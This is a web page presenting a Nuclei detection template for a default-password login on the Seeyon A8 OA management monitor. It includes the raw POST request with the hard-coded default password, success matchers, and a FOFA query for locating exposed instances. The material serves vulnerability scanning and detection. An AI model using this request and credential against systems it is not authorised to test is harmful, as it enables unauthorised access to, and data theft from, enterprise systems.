Skip to content

Seeyon A8 Management Monitor - Default Login

ID: seeyon-monitor-default-login

Severity: high

Author: SleepingBag945

Tags: seeyon,oa,default-login

Seeyon OA A8-m has status monitoring page information leakage. Attackers can obtain sensitive information such as website paths and user names for further attacks. Attackers can use this vulnerability to directly enter the application system or management system to conduct system, web page, data tampering and deletion, illegally obtaining system and user data, and may even cause the server to collapse.

id: seeyon-monitor-default-login
info:
name: Seeyon A8 Management Monitor - Default Login
author: SleepingBag945
severity: high
description: |
Seeyon OA A8-m has status monitoring page information leakage. Attackers can obtain sensitive information such as website paths and user names for further attacks. Attackers can use this vulnerability to directly enter the application system or management system to conduct system, web page, data tampering and deletion, illegally obtaining system and user data, and may even cause the server to collapse.
reference:
- http://wiki.peiqi.tech/wiki/oa/%E8%87%B4%E8%BF%9COA/%E8%87%B4%E8%BF%9COA%20A8%20status.jsp%20%E4%BF%A1%E6%81%AF%E6%B3%84%E9%9C%B2%E6%BC%8F%E6%B4%9E.html
- https://github.com/zan8in/afrog/blob/main/v2/pocs/afrog-pocs/default-pwd/seeyon-a8-management-monitor-default-password.yaml
metadata:
verified: true
max-request: 1
fofa-query: app="致远互联-OA"
tags: seeyon,oa,default-login
http:
- raw:
- |
POST /seeyon/management/index.jsp HTTP/1.1
Host: {{Hostname}}
Content-Type: application/x-www-form-urlencoded
password=WLCCYBD%40SEEYON
host-redirects: true
max-redirects: 2
matchers-condition: and
matchers:
- type: word
part: body
words:
- "<title>A8 Management Monitor</title>"
- "Connection Pooling"
condition: and
- type: status
status:
- 200
# digest: 4b0a00483046022100ab210649d02e9c6ac053a7a0176c0b80cffb72b82db130a025a3405e91b26c75022100e73405074f6c977554de9acbe0d5c412854ad933a7113380167fcfeeaf4b4eee:922c64590222798bb761d5b6d8e72950

This template is used to detect vulnerabilities in web applications. It can be used with the Nuclei tool to scan for specific patterns or behaviors.

Terminal window
$ nuclei -u "URL" -t "http/default-logins/seeyon/seeyon-monitor-default-login.yaml"

View on Github